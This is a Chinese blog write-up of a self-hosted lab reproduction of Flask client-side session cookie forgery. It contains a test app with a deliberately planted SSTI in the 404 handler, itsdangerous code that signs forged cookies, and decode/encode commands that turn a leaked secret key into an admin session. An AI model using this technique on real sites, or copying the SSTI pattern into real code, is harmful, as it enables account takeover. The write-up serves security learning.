2. 程式人生 > >客戶端session安全問題(flask)

客戶端session安全問題(flask)

阿新 發佈:2018-12-07

  前幾天看p牛的文章,學習了一波關於客戶端session的操作,文末提到了金鑰洩露,進一步可能造成身份偽造或者反序列化漏洞,於是自己搭了個flask環境做一下偽造身份的復現並做一下記錄。

#0x01 什麼是客戶端session

  對於我們熟悉的其它web開發環境,大部分對於session的處理都是將session寫入伺服器本地一個檔案,然後在cookie裡設定一個sessionId的欄位來區分不同使用者(常常是'/tmp/sess_'+sessionID),這一類就是在學校裡學到的session儲存在服務端,cookie儲存在客戶端的那鍾服務端session。

  然而,有些語言本身並不帶有良好的session儲存機制,於是採用其它的方法去對session進行處理,比如Django預設將session存在資料庫裡(剛知道=。=),而輕量的flask對資料庫操作的框架也沒有,選擇了將session整個的存到cookie裡(當然是加密後的),所以叫做客戶端session。

#0x02 flask對session的處理

  sessions.py:

    def get_signing_serializer(self, app):
        if not app.secret_key:
            return None
        signer_kwargs = dict(
            key_derivation=self.key_derivation,
            digest_method=self.digest_method
        )
        return URLSafeTimedSerializer(app.secret_key, salt=self.salt,
                                      serializer=self.serializer,
                                      signer_kwargs=signer_kwargs)

    def open_session(self, app, request):
        s = self.get_signing_serializer(app)
        if s is None:
            return None
        val = request.cookies.get(app.session_cookie_name)
        if not val:
            return self.session_class()
        max_age = total_seconds(app.permanent_session_lifetime)
        try:
            data = s.loads(val, max_age=max_age)
            return self.session_class(data)
        except BadSignature:
            return self.session_class()

    def save_session(self, app, session, response):
        domain = self.get_cookie_domain(app)
        path = self.get_cookie_path(app)

        # If the session is modified to be empty, remove the cookie.
        # If the session is empty, return without setting the cookie.
        if not session:
            if session.modified:
                response.delete_cookie(
                    app.session_cookie_name,
                    domain=domain,
                    path=path
                )

            return

        # Add a "Vary: Cookie" header if the session was accessed at all.
        if session.accessed:
            response.vary.add('Cookie')

        if not self.should_set_cookie(app, session):
            return

        httponly = self.get_cookie_httponly(app)
        secure = self.get_cookie_secure(app)
        samesite = self.get_cookie_samesite(app)
        expires = self.get_expiration_time(app, session)
        val = self.get_signing_serializer(app).dumps(dict(session))
        response.set_cookie(
            app.session_cookie_name,
            val,
            expires=expires,
            httponly=httponly,
            domain=domain,
            path=path,
            secure=secure,
            samesite=samesite
        )

  其中open和save分別對應著session的讀取和寫入,會開啟一個URLSafeTimedSerializer物件,調取它的loads或是dumps方法,URLSafeTimedSerializer繼承了URLSafeSerializerMixin和TimedSerializer,包含了一些序列化處理。

  在預設情況下,除了app.secret_key的值是未知的,其它的引數都是固定好的,如果專案使用了session機制,secret_key欄位是被強制要求設定的,可以通過在配置檔案裡寫入固定字串或啟動時隨機生成來獲得,假如攻擊者通過任意檔案讀取或其它手段拿到了專案的secret_key,那麼完全有可能解密和偽造cookie來控制使用者身份,進而做一些不可描述的事情。

例如如下程式碼:
from itsdangerous import *
import hashlib
from flask.json.tag import TaggedJSONSerializer
secret_key='f9cb5b2f-b670-4584-aad4-3e0603e011fe'  
salt='cookie-session'
serializer=TaggedJSONSerializer()
signer_kwargs=dict(key_derivation='hmac',digest_method=hashlib.sha1)
sign_cookie='eyJ1c2VybmFtZSI6eyIgYiI6IllXUnRhVzQ9In19.XAquJg.AUEZAdrYhYCk3pg4iYy_NIpfpD0'

val = URLSafeTimedSerializer(secret_key, salt=salt,
                                      serializer=serializer,
                                      signer_kwargs=signer_kwargs)
data= val.loads(sign_cookie)
print data									  
#{u'username': u'test'}

crypt= val.dumps({'username': 'admin'})
print crypt

 

#0x03 flask的身份偽造復現

測試用的程式碼比較簡單。

main.py:

# coding:utf8

import uuid
from flask import Flask, request, make_response, session,render_template, url_for, redirect, render_template_string

app = Flask(__name__)
app.config['SECRET_KEY']=str(uuid.uuid4())

@app.route('/')
def index():
    app.logger.info(request.cookies)

    try:
	username=session['username']
        return render_template("index.html",username=username)
    except Exception,e:
	
        return """<form action="%s" method='post'>
            <input type="text" name="username" required>
            <input type="password" name="password" required>
            <input type="submit" value="登入">
            </form>""" %url_for("login")


@app.route("/login/", methods=['POST'])
def login():
    username = request.form.get("username")
    password = request.form.get("password")
    app.logger.info(username)
    if username.strip():
	if username=="admin" and password!=str(uuid.uuid4()):
		return "login failed"
        app.logger.info(url_for('index'))
        resp = make_response(redirect(url_for("index")))
        session['username']=username
        return resp
    else:
        return "login failed"

@app.errorhandler(404)
def page_not_found(e):
	template='''
		{%% block body %%}
		<div class="center-content error">
		<h1>Oops! That page doesn't exist.</h1>
		<h3>%s</h3>
		</div>
		{%% endblock %%}
	'''%(request.url)
	return render_template_string(template),404

@app.route("/logout")
def logout():
    resp = make_response(redirect(url_for("index")))
    session.pop('username')
    return resp    

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=9999, debug=True)

  templates/index.html:

<!DOCTYPE html>
<html>
<body>
username: {{ username }}, <a href="{{ url_for('logout') }}">logout</a>
</body>
</html>

主要實現了一個session實現的登入操作,並特意留下了一個404頁面的ssti(關於flask的ctf比賽中常常會出現,據說開發人員經常會貪圖省事,不去單獨建立模板檔案而使用這樣的模板字串),可能還有其它bug。

 登入會顯示使用者名稱,正常情況下,admin使用者是無法登入的。

利用404頁面的ssti讀取內建變數,還有其它一些常用方法可以參考:https://blog.csdn.net/qq_33020901/article/details/83036927

我之前登入的cookie是:Cookie: session=eyJ1c2VybmFtZSI6ImhlaGUifQ.XApTkw.zcIUPrpo71h_doQs_GKtDlLesP8

使用session_cookie_manager.py解開得到使用者資訊。

[[email protected] temp]# python session_cookie_manager.py decode -s "a8bc2e85-d628-40f0-a56d-a86b19b4c1f9" -c "eyJ1c2VybmFtZSI6ImhlaG UifQ.XApTkw.zcIUPrpo71h_doQs_GKtDlLesP8"

{u'username': u'hehe'}

偽造admin使用者身份:

 

[[email protected] temp]# python session_cookie_manager.py encode -s "a8bc2e85-d628-40f0-a56d-a86b19b4c1f9" -t "{u'username': u'admin' }"
eyJ1c2VybmFtZSI6ImFkbWluIn0.XArr2w.O2zQzR4fFLCrGhDLjWol8-mLp7E

提交生成的cookie:

直接用admin身份成功登入。:)

#0x04感想

  作為一個程式設計師,在需要開發某些功能或實現某些服務時經常會把別人實現好的程式碼粗略看看就拿來用了,這篇文章教會我在特定情況下,如果對程式碼的實現不夠了解,某些不是漏洞的機密配置不做修改,就會在你毫不知情的情況下,成為給他人開啟防禦大門的內奸,關鍵是你出了問題還不知道問題根源在哪裡==。

參考:

https://www.leavesongs.com/PENETRATION/client-session-security.html

https://blog.csdn.net/qq_33850304/article/details/84726296

 

相關推薦

客戶session安全問題(flask)

  前幾天看p牛的文章,學習了一波關於客戶端session的操作,文末提到了金鑰洩露,進一步可能造成身份偽造或者反序列化漏洞,於是自己搭了個flask環境做一下偽造身份的復現並做一下記錄。 #0x01 什麼是客戶端session   對於我們熟悉的其它web開發環境,大部分對於session的處

服務器Session客戶Session(和Cookie區別)

也不會 文件存儲 其它 便在 ont 就會 分布式 的區別 部署 Session其實分為客戶端Session和服務器端Session。 當用戶首次與Web服務器建立連接的時候,服務器會給用戶分發一個 SessionID作為標識。SessionID是一個由24個字符組成的隨機

linux中對samba客戶進行安全部署

在上一篇部落格中,寫了samba的檔案共享方式,可以直接掛載到客戶端的某個資料夾下,例如: mount -o username=lei,password=lei //172.25.254.156/xupt /mnt/ ##掛載共享資料夾    這樣掛載上去以後,

客戶指令碼安全

客戶端安全的基礎是同源策略,什麼是同源策略呢?就是限制了不同源的“document”或指令碼,對當前“document”讀取或者設定屬性。有一點需要注意對於當前頁面來說頁面記憶體放JS的域並不重要,重要的是載入js頁面所在的域是什麼。例如在a.com下載入了<script src="b.com/b.js

伺服器Session客戶Session(和Cookie區別)

Session其實分為客戶端Session和伺服器端Session。當用戶首次與Web伺服器建立連線的時候,伺服器會給使用者分發一個 SessionID作為標識。SessionID是一個由24個字元組成的隨機字串。使用者每次提交頁面,瀏覽器都會把這個SessionID包含在

客戶和服務如何使用Token和Session

cnblogs blank style ssi exception font 統一 判斷 用戶 一、我們先解釋一下他的含義: 1、Token的引入:Token是在客戶端頻繁向服務端請求數據,服務端頻繁的去數據庫查詢用戶名和密碼並進行對比,判斷用戶名和密碼正確與否,並作

解決有關flask-socketio中服務客戶回調函數callback參數的問題(全網最全)

分享圖片 ready 發現 ted doc 客戶端 event return 建立 由於工作當中需要用的flask_socketio,所以自己學習了一下如何使用,查閱了有關文檔,當看到回調函數callback的時候,發現文檔裏都描述的不太清楚,最後終於琢磨出來了,分享給有

36、Flask實戰第36天:客戶權限驗證

man 前臺 role .html last endif 開發 運營 賬號 編輯cms_base.html <li><a href="#">{{ g.cms_user.username }}<span>[超級管理員]</

php 客戶與伺服器安全與破解

一般的加密和授權:轉發伺服器(代理伺服器) 解決方案:hhvm編譯程式碼   放扒取: js類 1:防止滑鼠右鍵事件,在html->body <body oncontextmenu=self.event.returnValue=false> 或

api介面對於客戶的身份認證方式以及安全措施 基於http協議的api介面對於客戶的身份認證方式以及安全措施

轉載 基於http協議的api介面對於客戶端的身份認證方式以及安全措施  由於http是無狀態的,所以正常情況下在瀏覽器瀏覽網頁,伺服器都是通過訪問者的cookie(cookie中儲存的jsessionid)來辨別客戶端的身份的,當客戶端進行登入伺服器也會將登入資訊存放在伺服器並與客戶端的coo

PHP客戶禁用了cookie之後session還能用嗎?

答案是非常明確的可以的。 在伺服器端獲取Session資料,必須知道SessionID,那麼這個ID又是需要cookie帶回來,禁用也就說明帶不回來,就想辦法給帶回來就是了。 以下是解決如何在這種情況下也使用session: 1、再設定php.ini檔案中的”session.use_

session與cookie的區別是什麼?如果客戶禁用了cookie功能,將會對session有什麼影響?

cookie 和session 的區別: a、cookie資料存放在客戶的瀏覽器上,session資料放在伺服器上。 b、cookie不是很安全,別人可以分析存放在本地的COOKIE並進行COOKIE欺騙 考慮到安全應當使用session。 c、session會在一定時間內儲存在伺服

自建無域名https服務客戶證書,nginx和spring boot應用使用同一個證書 ,並解決chrome安全警告的問題

參考連結: 自簽發ssl證書 【spring boot】配置ssl證書實現https 一、生成nginx的證書與配置chrome安全告警的問題 1.安裝openssl 2.生成根證書 openssl req -x509 -nodes -days 146

win7堡壘機遠端windowsserver2008出現“由於安全設定錯誤, 客戶無法連線到遠端計算機. 確定你已登入到網路後”

win 7 通過堡壘機 遠端連接出現 "由於安全設定錯誤, 客戶端無法連線到遠端計算機. 確定你已登入到網路後.” 錯誤 解決方法如下: 第一步:開啟"本地安全策略"- Win+R 並輸入 secpol.msc (或者在"管理工具"中開啟); 第二步:在本地安全策略中,開啟

android客戶與伺服器互動 如何保持session

最近在開發專案的過程中,遇到android與web伺服器要在同一session下通訊的問題。 在解決問題前先回顧下Session與Cookie: Cookie和Session都為了用來儲存狀態資訊,都是儲存客戶端狀態的機制,它們都是為了解決HTTP無狀態的問題而所做

Tomcat單向Https驗證搭建,親自實現與主流瀏覽器、Android/iOS移動客戶安全通訊

眾所周知,iOS9已經開始在聯網方面預設強制使用Https替換原來的Http請求了,雖然Http和Https各有各的優勢,但是總得來說,到了現在這個安全的資訊時代,開發者已經離不開Https了。 網上有很多搭建Https的教程,但是比較零散,Web瀏覽器端和移動端具體部署也不是特別明確,如果

android學習筆記之客戶與服務保持session登入狀態

剛進公司不久,也沒有具體專案任務,只有一個混合開發模式,使用AppCan開發的專案。 雖然混合開發很便捷、很高效,使用html和js就可以完成。 但我依然對android原生開發有著極高的熱情,尤其是在體驗了Android 5.0版本之後,更是對原生體驗著迷。 所以,我利用

flask 伺服器上面下載多個檔案 ,客戶一次性上傳多個檔案

  #encoding=utf8 import flask,os,sys,time from flask import request,send_from_directory import multiEmbeddings  import tensorflow as tf &n

Flask之處理客戶通過POST方法傳送的資料

作為一種HTTP請求方法,POST用於向指定的資源提交要被處理的資料。我們在某網站註冊使用者、寫文章等時候,需要將資料儲存在伺服器中,這是一般使用POST方法。 本文使用Python的requests庫模擬客戶端。 建立Flask專案 按照以下命令建立Flask專案H

在v$session表中記錄客戶IP

我們在查詢v$session表時,只能看到客戶端的機器名,而無法看到客戶機的IP地址。要想檢視IP地址可以建立一個數據庫級別的觸發器,在成功使用者登陸資料庫後將客戶的IP地址寫入v$session的client_info欄位中。 按如下方法建立這個觸發器(trigger):